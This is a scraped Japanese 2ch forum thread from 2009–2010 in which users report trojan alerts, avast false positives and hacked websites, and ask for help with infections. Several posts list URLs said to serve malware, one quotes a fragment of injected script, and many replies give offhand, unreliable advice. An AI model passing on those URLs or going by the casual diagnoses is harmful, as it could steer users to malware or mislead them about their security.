いつくらいで駆除されんだろ。2chって結構ウィルスいるんだな。
464 :名無しさん@お腹いっぱい。:2009/12/03(木) 04:37:58
なんでそんなつまらない釣りするの?
465 :名無しさん@お腹いっぱい。:2009/12/03(木) 04:53:40
avast!トラップだな
466 :名無しさん@お腹いっぱい。:2009/12/03(木) 11:02:55
いままで普通にJaneを使えていたのに、いま起動させようとしたところ
avastが反応して、『トロイの木馬を発見しました』とでてきて、起動できない
・・・。
そこで、もう一回ダウンロードしてみようとしたところ、ダウンロード中に
「トロイの木馬を発見しました」って出てくる・・・
どうしてーーーー
avastが反応して、『トロイの木馬を発見しました』とでてきて、起動できない
・・・。
そこで、もう一回ダウンロードしてみようとしたところ、ダウンロード中に
「トロイの木馬を発見しました」って出てくる・・・
どうしてーーーー
467 :名無しさん@お腹いっぱい。:2009/12/03(木) 11:11:04
誤検出じゃね
もう得意技だね
もう得意技だね
468 :名無しさん@お腹いっぱい。:2009/12/03(木) 11:27:14
>>467
とりあえず、avast一時停止させてJane再インスコしました・・・
とりあえず、avast一時停止させてJane再インスコしました・・・
469 :名無しさん@お腹いっぱい。:2009/12/03(木) 13:59:08
さっき実況にいたんだけど、
途中からavastがトロイの警告してくる。
一応駆除してるけど、実況板にウィルス貼った奴がいたのか。
全く迷惑な話だな。
途中からavastがトロイの警告してくる。
一応駆除してるけど、実況板にウィルス貼った奴がいたのか。
全く迷惑な話だな。
470 :名無しさん@お腹いっぱい。:2009/12/03(木) 14:24:26
あれ?俺もたったいまavest常駐させた状態でJane style起動したら「トロイの木馬が検出されました」 って出たよ。
一斉に誤探知か?
一斉に誤探知か?
471 :名無しさん@お腹いっぱい。:2009/12/03(木) 14:38:52
と、思ったら朝からavestの誤探知祭りらしい。
472 :名無しさん@お腹いっぱい。:2009/12/03(木) 14:40:10
今他で見てきたら、avast誤認知らしいね。
焦ったよw
焦ったよw
473 :名無しさん@お腹いっぱい。:2009/12/03(木) 17:26:48
avast自体がトロイそのものじゃん
474 :名無しさん@お腹いっぱい。:2009/12/03(木) 22:08:22
トロイの木馬に感染するよりも、誤検知のほうがウザかったりして…。
475 :名無しさん@お腹いっぱい。:2009/12/04(金) 03:29:00
476 :名無しさん@お腹いっぱい。:2009/12/04(金) 11:12:17
今回のavast!の不具合、たまにはそういうこともあるかなって思ってるよ。
不具合が続いたら続いたで、まだ他にも選択肢あるし。
不具合が続いたら続いたで、まだ他にも選択肢あるし。
477 :名無しさん@お腹いっぱい。:2009/12/05(土) 17:40:40
俺なんてたまたま学校の前を通りかかった時、3階の中学生から
「痴漢だ!痴漢がいる! おいコラ痴漢!」
って騒がれてもグッとこらえたのに…
「痴漢だ!痴漢がいる! おいコラ痴漢!」
って騒がれてもグッとこらえたのに…
478 :名無しさん@お腹いっぱい。:2009/12/05(土) 21:07:32
なんで歩いてるだけで痴漢なんだろ…。
479 :名無しさん@お腹いっぱい。:2009/12/07(月) 13:24:25
avast!の暴走、終わったんだな…。
480 :名無しさん@お腹いっぱい。:2009/12/07(月) 22:50:22
HPなどを見ていたら、
「トロイの木馬」の警告がでてきました・・・。
初めてのことなので何もわかりません。
これって感染したのでしょうか・・・。
「トロイの木馬」の警告がでてきました・・・。
初めてのことなので何もわかりません。
これって感染したのでしょうか・・・。
481 :名無しさん@お腹いっぱい。:2009/12/09(水) 13:42:39
エスパーじゃないからさ。
使っているアンチウイルスソフトのスレで。
使っているアンチウイルスソフトのスレで。
482 :名無しさん@お腹いっぱい。:2010/01/03(日) 22:35:54
2chの結城リナのトピックの 749 で
貼ってあったurlをクリックしたら、
グロイ画面(恨み)がでてきて消そうとしたら、
『逃げるのか?』と出てきて画面が消せずに
また消そうとしたら『逃げるのか?』が羅列した
画面が出てきてしまい消せなくなってしまい
強制終了しました、その後ウィルスバスターで
検索ました、検索画面で一番はじめに、
『検索中ートロイの木馬』の字がでました、結果、
大丈夫でしたが、ウィルスソフトでも分からない場合がある
と聞きましたので、分かる方がいたら教えて貰っても
宜しいですか?パソコン初心者なもので
ご教授を宜しくお願い致します
貼ってあったurlをクリックしたら、
グロイ画面(恨み)がでてきて消そうとしたら、
『逃げるのか?』と出てきて画面が消せずに
また消そうとしたら『逃げるのか?』が羅列した
画面が出てきてしまい消せなくなってしまい
強制終了しました、その後ウィルスバスターで
検索ました、検索画面で一番はじめに、
『検索中ートロイの木馬』の字がでました、結果、
大丈夫でしたが、ウィルスソフトでも分からない場合がある
と聞きましたので、分かる方がいたら教えて貰っても
宜しいですか?パソコン初心者なもので
ご教授を宜しくお願い致します
483 :名無しさん@お腹いっぱい。:2010/01/04(月) 15:54:40
パソコン初心者は
http://pc11.2ch.net/pcqa/
http://pc11.2ch.net/pcqa/
484 :名無しさん@お腹いっぱい。:2010/01/06(水) 01:41:07
滋賀県高速道路利用センターのHPにトロイか?
www.biwako.ne.jp/~kohsoku/
www.biwako.ne.jp/~kohsoku/
485 :名無しさん@お腹いっぱい。:2010/01/06(水) 16:30:35
486 :載せたサイトはクリックしないでください。:2010/01/06(水) 19:37:18
483さん、485さん、ありがとうございます、
482の者です。ちなみにこんな内容です、トピック『結城リナ』より
749 :名無しさん@ピンキー:2009/12/31(木) 16:55:46 ID:jE2BKvw/
なかなか良い
http://members.jcom.home.ne.jp/naoko7140/novel/death2.htm
上のは、くれぐれもクリックしないでくださいね、
けど、見ただけではウィルスかは分かりませんよね。
失礼しました。
485さん、その紹介してくれたサイトは正直、
怖いのでクリック出来ません、すいませんです。
482の者です。ちなみにこんな内容です、トピック『結城リナ』より
749 :名無しさん@ピンキー:2009/12/31(木) 16:55:46 ID:jE2BKvw/
なかなか良い
http://members.jcom.home.ne.jp/naoko7140/novel/death2.htm
上のは、くれぐれもクリックしないでくださいね、
けど、見ただけではウィルスかは分かりませんよね。
失礼しました。
485さん、その紹介してくれたサイトは正直、
怖いのでクリック出来ません、すいませんです。
487 :載せたサイトはクリックしないでください。:2010/01/06(水) 20:22:30
486の者です。485さん、
そのサイトもしかして、私が指摘したのと、同じですね?
(結城リナのトピック)
すいません、勘違いしてしまいました。
失礼しました。
そのサイトもしかして、私が指摘したのと、同じですね?
(結城リナのトピック)
すいません、勘違いしてしまいました。
失礼しました。
488 :名無しさん@お腹いっぱい。:2010/01/06(水) 22:11:34
ウィルス撒き散らしても黙殺
154 :名無しさん@そうだドライブへ行こう:2010/01/05(火) 00:44:23 ID:EQ9ctg6w0
ウイルスソフトが「トロイの木馬だよ」って拒絶するんだけど、
何か仕込んでるってこと?
156 :名無しさん@そうだドライブへ行こう:2010/01/05(火) 11:55:32 ID:kS3nQPGp0
検出されたウイルス(ワーム、スパイウエア)
Trojan-Downloader.JS.Agent.ewh
www.mag-x.com サーバの位置情報
157 :名無しさん@そうだドライブへ行こう:2010/01/05(火) 18:02:32 ID:goP4rkjn0
>/*GNU GPL*/ try{window.onl
ブログのページ開くなよ。
感染するぞ。
158 :名無しさん@そうだドライブへ行こう:2010/01/05(火) 22:02:57 ID:kI+PreKQ0
Acrobat使ってsiszyd32.exeと言うプログラムが侵入。
ftpのパスワード盗まれた様で、自分のHPが改ざんされていて、プロバイダーから
削除依頼が来ました。
HPの改ざんは公的機関のチェックに引っかかったそうです。
154 :名無しさん@そうだドライブへ行こう:2010/01/05(火) 00:44:23 ID:EQ9ctg6w0
ウイルスソフトが「トロイの木馬だよ」って拒絶するんだけど、
何か仕込んでるってこと?
156 :名無しさん@そうだドライブへ行こう:2010/01/05(火) 11:55:32 ID:kS3nQPGp0
検出されたウイルス(ワーム、スパイウエア)
Trojan-Downloader.JS.Agent.ewh
www.mag-x.com サーバの位置情報
157 :名無しさん@そうだドライブへ行こう:2010/01/05(火) 18:02:32 ID:goP4rkjn0
>/*GNU GPL*/ try{window.onl
ブログのページ開くなよ。
感染するぞ。
158 :名無しさん@そうだドライブへ行こう:2010/01/05(火) 22:02:57 ID:kI+PreKQ0
Acrobat使ってsiszyd32.exeと言うプログラムが侵入。
ftpのパスワード盗まれた様で、自分のHPが改ざんされていて、プロバイダーから
削除依頼が来ました。
HPの改ざんは公的機関のチェックに引っかかったそうです。
489 :感染報告:2010/01/06(水) 22:55:08
芸能プロダクションの「スペースクラフト」のサイトがトロイの木馬に
感染しています。
ttp://www.spacecraft.co.jp/
吉野紗香のページ見ようと思ったらカスペルスキーが反応。
Trojan-Downloader.JS.Agent.ewh
感染しています。
ttp://www.spacecraft.co.jp/
吉野紗香のページ見ようと思ったらカスペルスキーが反応。
Trojan-Downloader.JS.Agent.ewh
490 :名無しさん@お腹いっぱい。:2010/01/07(木) 10:07:11
ガンブラー・・・だったのかな?
年末に、優良のHPにアクセスしたら、トロイの木馬に感染したよ・・・
新種なのか検索しても、出てこなかった・・・
一応、ホンダ、モロゾフなど、新聞が書いてあるHP以外だったんだけどね
年末に、優良のHPにアクセスしたら、トロイの木馬に感染したよ・・・
新種なのか検索しても、出てこなかった・・・
一応、ホンダ、モロゾフなど、新聞が書いてあるHP以外だったんだけどね
491 :名無しさん@お腹いっぱい。:2010/01/07(木) 11:49:11
ウイルスソフトがトロイの木馬を検出しました
しかし、そのソフトが推奨している方法で隔離(?)しました
これだけで安全なのでしょうか?
今後普通にこのパソコンを使っても大丈夫なのでしょうか?
しかし、そのソフトが推奨している方法で隔離(?)しました
これだけで安全なのでしょうか?
今後普通にこのパソコンを使っても大丈夫なのでしょうか?
492 :名無しさん@お腹いっぱい。:2010/01/07(木) 14:03:24
>>490
告知しないとこのほうが多いよ(特にすぐヤラレちゃう上に数が多い中小企業)
告知しないとこのほうが多いよ(特にすぐヤラレちゃう上に数が多い中小企業)
493 :名無しさん@お腹いっぱい。:2010/01/07(木) 14:09:18
俺も取引先のHPの改竄見つけて教えてあげたけど、
お礼もそこそこに、どこにも漏らすなと圧力掛けられたよ。
お礼もそこそこに、どこにも漏らすなと圧力掛けられたよ。
494 :名無しさん@お腹いっぱい。:2010/01/07(木) 17:22:52
2chにこっそり書けばいいのに
495 :名無しさん@お腹いっぱい。:2010/01/07(木) 18:58:13
ガンプラに関してはaguse(カスペ)しか頼りにならないのね。
496 :名無しさん@お腹いっぱい。:2010/01/07(木) 22:31:53
avastも(ついでにGDATAも)SophosもNOD32もおっけ
jsをシカトしてhtmlに限定すればMcAfeeもBitも(ついでにF-Secureも)おっけ
jsをシカトしてhtmlに限定すればMcAfeeもBitも(ついでにF-Secureも)おっけ
497 :名無しさん@お腹いっぱい。:2010/01/08(金) 06:14:15
aviraもOK
498 :載せたサイトはクリックしないでください。:2010/01/08(金) 20:28:23
487,486のものです、
485さん、やはり載せたのは、ウィルスですか?
度々すいません、宜しければ
教えてもらっても良いですか?
485さん、やはり載せたのは、ウィルスですか?
度々すいません、宜しければ
教えてもらっても良いですか?
499 :名無しさん@お腹いっぱい。:2010/01/08(金) 20:34:04
500 :名無しさん@お腹いっぱい。:2010/01/09(土) 10:58:54
>>498
おまえが犯人だろ。必死すぎなんだよ。
おまえが犯人だろ。必死すぎなんだよ。
501 :載せたサイトはクリックしないでください。:2010/01/10(日) 13:06:17
498です、500さん、
犯人ではないですよ。
2チャンの結城リナのトピックの
749が書いてあったたサイトを踏んでしまっただけです。
おっかない『恨むぞ』みたいな画面になってしまったので、
ウィルス感染してしまったかもしれないので、
確かに必死です、情報が欲しいですから。
不快に感じてしまいましたら、すいませんです。
犯人ではないですよ。
2チャンの結城リナのトピックの
749が書いてあったたサイトを踏んでしまっただけです。
おっかない『恨むぞ』みたいな画面になってしまったので、
ウィルス感染してしまったかもしれないので、
確かに必死です、情報が欲しいですから。
不快に感じてしまいましたら、すいませんです。
502 :名無しさん@お腹いっぱい。:2010/01/10(日) 19:32:51
2チャンってナンですか?
503 :名無しさん@お腹いっぱい。:2010/01/11(月) 09:00:18
ウイルスじゃないのでは?
504 :名無しさん@お腹いっぱい。:2010/01/11(月) 09:41:16
パソコンを起動するたびにクイックスキャンでインターネット一時ファイル
キャッシュからトロイが検出されるんだけど,リカバリするべきですかね?
symantecのサイトを参照すると駆除:易ってあるんだけど,駆除方法ためして
も駄目だった…
キャッシュからトロイが検出されるんだけど,リカバリするべきですかね?
symantecのサイトを参照すると駆除:易ってあるんだけど,駆除方法ためして
も駄目だった…
505 :載せたサイトはクリックしないでください。:2010/01/11(月) 14:44:36
501のものです、
502さん、2チャンネルです、これです。
結城リナのトピックの749に貼られてたサイトを踏んで、
しまったんです(このトピックの486で詳細をのせてます)
503さん、ウィルスではないですか?
そのグロイ画面になった時は、画面が消せなくなって強制終了しました。
その後、症状はまだないのですが、バスターで検索をかけても、
何も引っ掛からないです、けどウィルスによっては引っ掛からないときも、
あるのですよね。そもそもウィルスにやられた瞬間て分かるものなのですか?
502さん、2チャンネルです、これです。
結城リナのトピックの749に貼られてたサイトを踏んで、
しまったんです(このトピックの486で詳細をのせてます)
503さん、ウィルスではないですか?
そのグロイ画面になった時は、画面が消せなくなって強制終了しました。
その後、症状はまだないのですが、バスターで検索をかけても、
何も引っ掛からないです、けどウィルスによっては引っ掛からないときも、
あるのですよね。そもそもウィルスにやられた瞬間て分かるものなのですか?
506 :名無しさん@お腹いっぱい。:2010/01/14(木) 22:18:27
↓このスレにカスペがトロイ反応したから気をつけろ
※ McAfee分散型セキュリティシステムってどうよ?
※ McAfee分散型セキュリティシステムってどうよ?
507 :名無しさん@お腹いっぱい。:2010/01/14(木) 22:28:02
プ
508 :名無しさん@お腹いっぱい。:2010/01/15(金) 21:33:37
クライアントのサイトがトロイに感染したらしく別の客から連絡があって
「なんとかしてくれ」って連絡きたんだけど、
3年位前に作ったサイトだし、
あたし、デザイナー何すればいいのか全くわからん。
macユーザーなもんでうとくてうとくて…
一応サーバー屋に連絡してみたけど、
営業時間終わってて週明けじゃないと繋がらないw
先方の担当にもそれを伝えたら
「わかりましたー。本当に感染してるんですかねぇ?」ってのほほんな感じ。
サイト自体がばらまく場合の感染経路はやっぱり外部からのハックなの?
それとも内部にウィルスを持ってる人がいてその人がコントロールパネル的な
モノにアクセスをして感染とかするの?
おせーて下さい
「なんとかしてくれ」って連絡きたんだけど、
3年位前に作ったサイトだし、
あたし、デザイナー何すればいいのか全くわからん。
macユーザーなもんでうとくてうとくて…
一応サーバー屋に連絡してみたけど、
営業時間終わってて週明けじゃないと繋がらないw
先方の担当にもそれを伝えたら
「わかりましたー。本当に感染してるんですかねぇ?」ってのほほんな感じ。
サイト自体がばらまく場合の感染経路はやっぱり外部からのハックなの?
それとも内部にウィルスを持ってる人がいてその人がコントロールパネル的な
モノにアクセスをして感染とかするの?
おせーて下さい
509 :名無しさん@お腹いっぱい。:2010/01/16(土) 04:16:24
気持ち悪いです。
510 :名無しさん@お腹いっぱい。:2010/01/31(日) 02:06:59
>>508
外部からjavascriptとかを書き込むパターンが多いとは聞きます
あと以下のスレにも詳しい人がいそうです
↓
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263865118/l50
外部からjavascriptとかを書き込むパターンが多いとは聞きます
あと以下のスレにも詳しい人がいそうです
↓
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263865118/l50
511 :名無しさん@お腹いっぱい。:2010/01/31(日) 09:42:51
コピペですいません。
北斗の拳更新切らしてしまって、なんかヘンなサイトを踏んでしまい、
トロイの木馬警告が出ましたんで、もう一回踏んでみたら、
マカフィー無料スキャンで「JS/Redirector.cに感染しました」と出ました。
そこでウイルスキラーゼロを買ってきて、スキャンさせても「感染0」
もう一度マカフィー無料スキャンをやってみても「感染0」になります。
これは感染しているのでしょうか?
北斗の拳更新切らしてしまって、なんかヘンなサイトを踏んでしまい、
トロイの木馬警告が出ましたんで、もう一回踏んでみたら、
マカフィー無料スキャンで「JS/Redirector.cに感染しました」と出ました。
そこでウイルスキラーゼロを買ってきて、スキャンさせても「感染0」
もう一度マカフィー無料スキャンをやってみても「感染0」になります。
これは感染しているのでしょうか?
512 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:28:13
誤検出だと思うけどなー
513 :名無しさん@お腹いっぱい。:2010/02/02(火) 09:27:24
exe改変でアンチウイルスソフト回避で思った事はトレンドマイクロ糞だな
514 :名無しさん@お腹いっぱい。:2010/02/05(金) 22:42:04
vistaに感染するback orificeやsubsevenの用な遠隔操作できるトロイの木馬はあるのでしょうか?
515 :名無しさん@お腹いっぱい。:2010/02/06(土) 17:23:02
>>514
ざらにある。
ざらにある。
516 :名無しさん@いたづらはいやづら:2010/02/14(日) 14:13:39
517 :名無しさん@お腹いっぱい。:2010/02/17(水) 01:39:38
トロイの木馬がノートン使えなくさせるというのはあるかな?
518 :名無しさん@お腹いっぱい。:2010/02/21(日) 09:53:56
ウイルスを自社開発するのがセキュリティー膾炙のお仕事
519 :名無しさん@お腹いっぱい。:2010/02/26(金) 03:28:51
www●kanai-cpa●or●jp
520 :名無しさん@お腹いっぱい。:2010/02/26(金) 15:40:47
ボクもわたしもウイルス拾いしたいょー
そんなあなたのご要望にお答えします
♥ういるすキラーRISING 瑞星
友の会サイト♥
http://bbs.ikaka.com/showforum-20035-2.aspx
そんなあなたのご要望にお答えします
♥ういるすキラーRISING 瑞星
友の会サイト♥
http://bbs.ikaka.com/showforum-20035-2.aspx
521 :名無しさん@お腹いっぱい。:2010/03/05(金) 12:47:50
トロイの木馬が私のパソコンに侵入した。
アンチウィルスソフトがウィルスを消してくれたけど、
その間に私の個人情報が流れまくっている事だろう・・・・・。
アンチウィルスソフトがウィルスを消してくれたけど、
その間に私の個人情報が流れまくっている事だろう・・・・・。
522 :名無しさん@お腹いっぱい。:2010/03/07(日) 10:33:50
523 :名無しさん@お腹いっぱい。:2010/03/08(月) 22:02:42
ipxycoo.bak というファイルがWin32:Kate AL[Tri]という名前のマルウェアに感染しています。avastで検知して、削除していますが無限にわいてきます。どうすればいいでしょうか?
524 :名無しさん@お腹いっぱい。:2010/03/10(水) 15:53:12
ウィルスソフト販売伸ばす為にウィルス感染ソフト流通されてるんでしょ
525 :名無しさん@お腹いっぱい。:2010/03/13(土) 19:22:45
TROJ_GEN.UAB241Wというのを検出したんですが、ウィルス一覧などで調べてもググッてもヒットしません。
どんなトロイの木馬かわかる方いましたら御教授下さい。お願いします。
どんなトロイの木馬かわかる方いましたら御教授下さい。お願いします。
526 :名無しさん@お腹いっぱい。:2010/03/15(月) 11:52:27
>525 知らないうちに掘られてるよ!うん、きっとそうさ・・・
そのくらい気をつけなきゃいけない木馬ってこと!!
そのくらい気をつけなきゃいけない木馬ってこと!!
527 :名無しさん@お腹いっぱい。:2010/03/17(水) 12:50:12
>526
そんなやばい木馬でしたか…。駆除して今のところ実害は無いですが、パスワードとか変えます。。
そんなやばい木馬でしたか…。駆除して今のところ実害は無いですが、パスワードとか変えます。。
528 :名無しさん@お腹いっぱい。:2010/03/17(水) 23:37:29
>527
>駆除して今のところ実害は無いですが、
もう既に漏れ洩れだと思うよ・・・
>駆除して今のところ実害は無いですが、
もう既に漏れ洩れだと思うよ・・・
529 :名無しさん@お腹いっぱい。:2010/03/23(火) 01:55:37
去年の5月頃に俺がかかったreader_s.exeウィルスは凶悪すぎた。
@ウィルス起動
Aネットワークサイトからreader_s.exeを強制的にダウンロードして起動させられる(目では見えない)
(この時点でもうパソコンの一部のサービスがウィルスにより壊されているためエラーが頻繁に出る)
BHDD(その時点で繋いである記憶媒体も)に入っている全ての実行プラグラム(.exe)が改ざんされ、全ての実行プラグラムが@と同じウィルスを持つようになる。
以降ループ。
怖いことに
もう今までのデータは諦めようとして、CドライブをフォーマットしてOS再インスコしても、その後ほかのドライブに入っていた感染されし実行プラグラムを起動することでまたPC壊れるハメになるんだよなあ
参考までに。
@ウィルス起動
Aネットワークサイトからreader_s.exeを強制的にダウンロードして起動させられる(目では見えない)
(この時点でもうパソコンの一部のサービスがウィルスにより壊されているためエラーが頻繁に出る)
BHDD(その時点で繋いである記憶媒体も)に入っている全ての実行プラグラム(.exe)が改ざんされ、全ての実行プラグラムが@と同じウィルスを持つようになる。
以降ループ。
怖いことに
もう今までのデータは諦めようとして、CドライブをフォーマットしてOS再インスコしても、その後ほかのドライブに入っていた感染されし実行プラグラムを起動することでまたPC壊れるハメになるんだよなあ
参考までに。
530 :名無しさん@お腹いっぱい。:2010/03/25(木) 20:54:02
今日バスターがトロイ検出したんだけど
感染したファイルを消せばもう大丈夫なの?
因みにtroj_gen.mzなんちゃらってやつ
感染したファイルを消せばもう大丈夫なの?
因みにtroj_gen.mzなんちゃらってやつ
531 :名無しさん@お腹いっぱい。:2010/03/25(木) 21:47:44
>530 もう他のファイルもBastered!!
532 :名無しさん@お腹いっぱい。:2010/03/28(日) 16:52:21
>>529 どうすればそんな凶悪なウィルスにかかるか逆に気になる
533 :名無しさん@お腹いっぱい。:2010/03/31(水) 05:28:42
海外ネット見てたらウイルスがなんとかって
表示が出てファイルをスキャンしますみたいなのが
勝手に始まり、途中で止めたんだが
気になってシマンテックノオンラインスキャンしたら、
一時フォルダにdownloaderってのがあった。
どうやらトロイらしいんでノートン先生とか
アバスト使ったりしたんだが、何故か
シマンテックのオンラインだと引っかかる。。。
AVGも試してみたが何も引っかからない、
一時ファイルはIEのもwindowsのも消したんだが
それでも変わらず。
しまいにはオンラインでも引っかからなくなったw
これは初期化ですかね?
表示が出てファイルをスキャンしますみたいなのが
勝手に始まり、途中で止めたんだが
気になってシマンテックノオンラインスキャンしたら、
一時フォルダにdownloaderってのがあった。
どうやらトロイらしいんでノートン先生とか
アバスト使ったりしたんだが、何故か
シマンテックのオンラインだと引っかかる。。。
AVGも試してみたが何も引っかからない、
一時ファイルはIEのもwindowsのも消したんだが
それでも変わらず。
しまいにはオンラインでも引っかからなくなったw
これは初期化ですかね?
534 :名無しさん@お腹いっぱい。:2010/04/01(木) 05:42:26
たぶん>>530と同じやつだと思うんだけど、バスターさんがTROJ_Gen.MZ40M2ってのを検出した。
ググってみても海外のサイトばっかでこれがどういうウイルスなのか分からないんだけど、やっぱりリカバリーするべきなのかな?
質問だけで申し訳ない。
ググってみても海外のサイトばっかでこれがどういうウイルスなのか分からないんだけど、やっぱりリカバリーするべきなのかな?
質問だけで申し訳ない。
535 :名無しさん@お腹いっぱい。:2010/04/06(火) 23:37:54
>534 リカバリしても、別ドライブあるんならそっちまでやられてるかもよ・・・
536 :名無しさん@お腹いっぱい。:2010/04/18(日) 01:57:11
MZ back doorって相手のダイナミックDNSのサーバー(?)知らないと出来ないんですか?
537 :名無しさん@お腹いっぱい。:2010/04/23(金) 16:53:18
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_EMBEDDED.BW&VSect=T
このウイルスを検出して削除しました
最近ブルースクリーンエラー&再起動や突然のフリーズに困っていたんですがこれは関係ないですかね?
このウイルスを検出して削除しました
最近ブルースクリーンエラー&再起動や突然のフリーズに困っていたんですがこれは関係ないですかね?
538 :名無しさん@お腹いっぱい。:2010/05/12(水) 11:34:16
トロイの木馬でいちばん嫌なのはただのスパイウェアじゃなくてリモートコントロール機能があるソフトw
539 :名無しさん@お腹いっぱい。:2010/06/09(水) 22:28:47
http://www.bestofunder.com/?cgi-bin/cx/loader/up129836.zip.html
このリンク踏んじゃいましたが、どのような被害があるかどなたかおしえてもらえますでしょうか?
このリンク踏んじゃいましたが、どのような被害があるかどなたかおしえてもらえますでしょうか?
540 :名無しさん@お腹いっぱい。:2010/06/10(木) 03:45:06
541 :名無しさん@お腹いっぱい。:2010/06/10(木) 23:40:45
>>539
感染者は2chに来るな
感染者は2chに来るな
542 :名無しさん@お腹いっぱい。:2010/07/02(金) 05:07:00
トロイの組み込まれたリンクを踏んだんだけどAVGフリーには全く反応なし
Windowsのダイアログで問題が解決できませんみたいな表示が出たぐらいで
今のところ目立った悪影響はないんだけど、心配なので
セーフモードでAVGスキャンしても検出されなかった。
IEが弾いてくれたのかわからないけど、トロイの組み込まれtらリンク踏んでも
セキュリティが無反応で結局何ともなかったという例はあるのですか?
何かあればセーフモードで引っかかるはずなんだけど
AVGが優れてたからなのかIEが知らぬ間に弾いてくれたのかはっきりしないのがちょっと不安・・・
Windowsのダイアログで問題が解決できませんみたいな表示が出たぐらいで
今のところ目立った悪影響はないんだけど、心配なので
セーフモードでAVGスキャンしても検出されなかった。
IEが弾いてくれたのかわからないけど、トロイの組み込まれtらリンク踏んでも
セキュリティが無反応で結局何ともなかったという例はあるのですか?
何かあればセーフモードで引っかかるはずなんだけど
AVGが優れてたからなのかIEが知らぬ間に弾いてくれたのかはっきりしないのがちょっと不安・・・
543 :名無しさん@お腹いっぱい。:2010/08/05(木) 12:04:24
ウイルスバスターいれててもトロイ仕込まれて涙目。
隔離&駆除したけれど、ブルースクリーンエラー&再起動の現象。
Cドライブのみのリカバリだけでは無理で、クリーンインストールしなおしてなんとか復帰した。
Windows updateマンドクセ・・・
隔離&駆除したけれど、ブルースクリーンエラー&再起動の現象。
Cドライブのみのリカバリだけでは無理で、クリーンインストールしなおしてなんとか復帰した。
Windows updateマンドクセ・・・
544 :名無しさん@お腹いっぱい。:2010/08/08(日) 09:47:40
池沼・情弱と言われるのはしかたがないが
「トロイの木馬に感染したのがどうしてわかったの?」
セキュリティソフトのスキャンで見つかっただけじゃないの
「トロイの木馬に感染したのがどうしてわかったの?」
セキュリティソフトのスキャンで見つかっただけじゃないの
545 :名無しさん@お腹いっぱい。:2010/08/08(日) 15:45:29
546 :名無しさん@お腹いっぱい。:2010/08/14(土) 13:45:48
Windows Live OneCareのプロテクトスキャンの結果、
>とても危険性の高い問題が2個見つかりました
> Trojan:Java/Rowindal.A
> 問題1
> c:\documents and setting\俺の\application data\sun\java\
> deployment\cache\6.0\31\7089bc9f-6c566947
> TrojanClicker:Win32/Yabector.gen
> 問題1
> c:\program files\unlocker\ebay_shortcuts_1016.exe
ちなみに別のPCでも Trojan:Java/Rowindal.A を発見。この時は、\cache\6.0\31 の \31 が \11 だったような気がします。ちなみにVB2010では無反応でした。
>とても危険性の高い問題が2個見つかりました
> Trojan:Java/Rowindal.A
> 問題1
> c:\documents and setting\俺の\application data\sun\java\
> deployment\cache\6.0\31\7089bc9f-6c566947
> TrojanClicker:Win32/Yabector.gen
> 問題1
> c:\program files\unlocker\ebay_shortcuts_1016.exe
ちなみに別のPCでも Trojan:Java/Rowindal.A を発見。この時は、\cache\6.0\31 の \31 が \11 だったような気がします。ちなみにVB2010では無反応でした。
547 :名無しさん@お腹いっぱい。:2010/08/18(水) 04:31:21
たーいへーんだー
548 :名無しさん@お腹いっぱい。:2010/08/24(火) 20:08:48
549 :名無しさん@お腹いっぱい。:2010/08/29(日) 02:07:38
agent.lizってトロイアンは流行ってるのでしょうか
550 :名無しさん@お腹いっぱい。:2010/09/09(木) 01:50:48
シマンテックのauto-protectで毎日同じトロイの木馬が検出・削除されてます。
そのウィルスのファイルをネット検索したら誤報みたいな英語のページが出て来たんだけど翻訳に自信がなくて参ってます。
シマンテックが誤報ファイル一覧とか出してはいないんでしょうか
そのウィルスのファイルをネット検索したら誤報みたいな英語のページが出て来たんだけど翻訳に自信がなくて参ってます。
シマンテックが誤報ファイル一覧とか出してはいないんでしょうか
551 :名無しさん@お腹いっぱい。:2010/09/14(火) 13:30:53
AVGでabload_r.AKCというトロイの木馬が検出されたけど「オブジェクトに
アクセスできません」とでて駆除できない。svchost.exeやExploer.exe、
IE、Firefox.exeなどから検出されてる。
同様のケースの人いませんか?
アクセスできません」とでて駆除できない。svchost.exeやExploer.exe、
IE、Firefox.exeなどから検出されてる。
同様のケースの人いませんか?
552 :名無しさん@お腹いっぱい。:2010/09/23(木) 05:52:54
2ちゃんの自作PCの板にいくと、トロイの木馬として
AVASTが動いてページを見られなくなりました。
同じような方いませんか?
AVASTが動いてページを見られなくなりました。
同じような方いませんか?
553 :名無しさん@お腹いっぱい。:2010/09/24(金) 02:20:27
>552
俺もいっしょ
俺もいっしょ
554 :名無しさん@お腹いっぱい。:2010/09/26(日) 18:21:00
Trojan .PWS Webmonierってのに感染した
助けてくだされ!
Win98使ってます・・・
助けてくだされ!
Win98使ってます・・・
555 :名無しさん@お腹いっぱい。:2010/09/26(日) 21:34:13
Win98…氏ね
556 :名無しさん@お腹いっぱい。:2010/09/26(日) 21:46:11
原始人だからって士ねはないでしょ
557 :名無しさん@お腹いっぱい。:2010/09/26(日) 23:23:49
サポートが終了したOSを使っているやつが
セキュリティ板にくるんじゃねーよ
セキュリティ板にくるんじゃねーよ
558 :名無しさん@お腹いっぱい。:2010/09/26(日) 23:38:27
>>554
初期化すれば無問題
初期化すれば無問題
560 :名無しさん@お腹いっぱい。:2010/09/28(火) 15:22:23
AVGが急にGeneric19.AEFAというトロイの木馬を検出したんですが
ググってもろくにヒットしなくてこれはどういったトロイなのか分かる人いませんか?
ググってもろくにヒットしなくてこれはどういったトロイなのか分かる人いませんか?
561 :名無しさん@お腹いっぱい。:2010/09/28(火) 23:19:24 BE:4315896498-2BP(212)
562 :名無しさん@お腹いっぱい。:2010/09/29(水) 13:55:36
俺も割れやってないのに検出されたわ
563 :名無しさん@お腹いっぱい。:2010/09/29(水) 15:19:54
誤検出みたいだね
俺も同人ソフトいくつか隔離されちゃった…
治ってからインスコしなおしだ
俺も同人ソフトいくつか隔離されちゃった…
治ってからインスコしなおしだ
564 :名無しさん@お腹いっぱい。:2010/09/29(水) 15:25:12
なんか吉里吉里本体とそれで作られたフリゲーが続々と隔離室へ行ってしまう
565 :名無しさん@お腹いっぱい。:2010/09/29(水) 15:32:02
これに合わせたかのようなサイトメンテ。
最新版がでるようだが、どうなってんだろうか。
最新版がでるようだが、どうなってんだろうか。
★セキュリティ初心者質問スレッド から
http://hibari.2ch.net/test/read.cgi/sec/1276269248/3
http://hibari.2ch.net/test/read.cgi/sec/1276269248/658
